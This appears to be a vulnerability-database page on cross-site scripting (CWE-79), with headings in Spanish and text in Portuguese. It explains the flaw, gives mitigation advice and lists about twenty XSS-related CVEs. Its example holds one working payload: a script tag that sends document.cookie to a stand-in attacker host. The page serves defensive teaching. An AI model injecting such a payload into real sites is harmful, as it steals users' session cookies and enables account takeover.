Fallos del tipo CWE-79

28.521 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2020-24416HIGHBlind stored XSS in Marketo Sales insight plugin for SalesForceEPSS 1.9%CVE-2024-27314LOWStored XSS VulnerabilityEPSS 1.9%CVE-2021-24436—W3 Total Cache < 2.1.4 - Reflected XSS in Extensions Page (Attribute Context)EPSS 1.9%CVE-2019-17632—In Eclipse Jetty versions 9.4.21.v20190926, 9.4.22.v20191022, and 9.4.23.v20191118, the generation of default unhandled Error response conteEPSS 1.9%CVE-2025-25296MEDIUMLabel Studio allows Cross-Site Scripting (XSS) via GET request to `/projects/upload-example` endpointEPSS 1.9%CVE-2018-16471—There is a possible XSS vulnerability in Rack before 2.0.6 and 1.6.11. Carefully crafted requests can impact the data returned by the `schemEPSS 1.9%CVE-2023-0214MEDIUMXSS in Skyhigh Security SWGEPSS 1.9%CVE-2023-4973LOWAcademy LMS GET Parameter filter cross site scriptingEPSS 1.9%CVE-2020-9734CRITICALStored XSS in AEM Forms componentEPSS 1.9%CVE-2020-9741CRITICALStored XSS in AEM Forms ComponentsEPSS 1.9%CVE-2020-9740CRITICALStored XSS in AEM Design Importer ComponentEPSS 1.9%CVE-2023-29347HIGHWindows Admin Center Spoofing VulnerabilityEPSS 1.9%CVE-2022-0963MEDIUMUnrestricted XML Files Leads to Stored XSS in microweber/microweberEPSS 1.9%CVE-2021-24228—Patreon WordPress < 1.7.2 - Reflected XSS on Login FormEPSS 1.9%CVE-2023-22373MEDIUMCross-site scripting vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote authenticated attacker to inject an aEPSS 1.9%CVE-2018-0251—A vulnerability in the Web Server Authentication Required screen of the Clientless Secure Sockets Layer (SSL) VPN portal of Cisco Adaptive SEPSS 1.9%CVE-2022-1007—Advanced Booking Calendar < 1.7.1 - Reflected Cross-Site ScriptingEPSS 1.9%CVE-2021-24979—Paid Memberships Pro < 2.6.6 - Reflected Cross-Site ScriptingEPSS 1.9%CVE-2020-4054HIGHCross-site Scripting in SanitizeEPSS 1.9%CVE-2022-1724—Simple Membership < 4.1.1 - Reflected Cross-Site ScriptingEPSS 1.8%